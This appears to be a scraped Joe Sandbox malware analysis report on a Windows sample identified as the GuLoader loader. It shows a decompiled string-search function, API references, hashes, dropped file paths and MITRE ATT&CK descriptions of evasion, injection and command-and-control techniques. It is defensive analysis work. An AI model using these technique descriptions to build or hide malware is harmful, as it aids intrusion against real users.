Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f6c
0x00405f6e
0x00405f71
0x00405f9d
0x00405f76
0x00405f7f
0x00405f84
0x00405f8f
0x00405f92
0x00405fae
0x00405f94
0x00405f9b
0x00000000
0x00405f9b
0x00405fa7
0x00405fab
0x00405fab
0x00405fa5
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xKBLVUHoY6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\Modregnings.Xen

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\battery-caution-symbolic.svg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless\go-first-rtl.png

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
xKBLVUHoY6.exe

Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BB6 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 6E551817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Function 004063D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON